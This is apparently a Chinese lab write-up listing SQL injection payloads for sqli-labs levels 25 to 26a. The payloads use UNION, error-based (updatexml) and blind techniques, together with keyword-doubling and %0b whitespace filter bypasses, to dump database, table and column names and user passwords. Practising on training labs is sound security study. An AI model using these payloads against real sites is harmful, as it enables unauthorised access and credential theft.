sqllibs 25-26关payload

目录

前言

Less-25

Less-25a

Less-26（报错注入）

Less-26（联合注入）

Less-26a（爆破注入）

Less-26a（联合注入）

---

前言

方法不止一种，在此只列出部分方法。

Less-25（使用联合注入）

查库名

?id=-1' union select 1,user(),database()--+

查表名

?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+

查列名

?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'--+

查用户名、密码

?id=-1' union select 1,group_concat(username),group_concat(passwoorrd) from users--+

Less-25a（使用联合注入）

查库名

?id=-1 union select 1,user(),database()

查表名

?id=-1 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'

查列名

?id=-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'

查用户名、密码

?id=-1 union select 1,group_concat(username),group_concat(passwoorrd) from users--+

Less-26（使用报错注入）

查库名

?id=' || updatexml(1,(select (concat(0x7e,database(),0x7e))),1) ||'

查表名

?id=' || updatexml(1,concat(0x7e,(select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema='security')),0x7e),1) ||'

查列名

?id=' || updatexml(1,mid(concat(0x7e,(select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name='users')),0x7e),45,30),1) ||'

查用户名、密码

?id=' || updatexml(1,concat(0x7e,(select (group_concat(username,'==',passwoorrd)) from (users) where (id=1)),0x7e),1) ||'

或者使用concat_ws

?id=' || updatexml(1,concat(0x7e,(select (group_concat(concat_ws('=',username,passwoorrd))) from (users) where (id=1)),0x7e),1) ||'

Less-26（使用联合注入）

查库名

?id=0'%0bunion %0bselect %0b1,database(),user()%0b'1

查表名

?id=0'%0bunion %0bselect %0b1,database()，(select%0bgroup_concat(table_name)from

(infoorrmation_schema.tables)where(table_schema='security'))%0b'1

查列名

?id=0'%0bunion %0bselect %0b1,database(),(select%0bgroup_concat(column_name)from

(infoorrmation_schema.columns)where(table_name='users'))%0b'1

查用户名、密码

?id=0'%0bunion %0bselect %0b1,(select%0bgroup_concat(username)from(users)),(select%0bgroup_concat(passwoorrd)from(users))%0b'1

Less-26a（使用爆破注入）

查库长度

?id=-1') anandd (length(user())=14) || ('

爆破库名

?id=-1') anandd (ascii(substr(user(),1,1))=114) || ('

Less-26a（使用联合注入）

查库名

?id=0')%0b union%0bselect%0b1,database(),3%0b oorr%0b('   

查表名

?id=0')%0b union%0bselect%0b1,(select%0bgroup_concat(table_name) from (infoorrmation_schema.tables) where (table_schema='security')),3%0b oorr%0b('

查列名

?id=0')%0b union%0bselect%0b1,(select%0bgroup_concat(column_name) from (infoorrmation_schema.columns) where (table_name='users')),3%0b oorr%0b('

查用户名、密码

?id=0')%0b union%0bselect%0b1,(select%0bconcat(username,'==',passwoorrd)%0bfrom%0busers%0blimit%0b0,1),3%0b oorr%0b('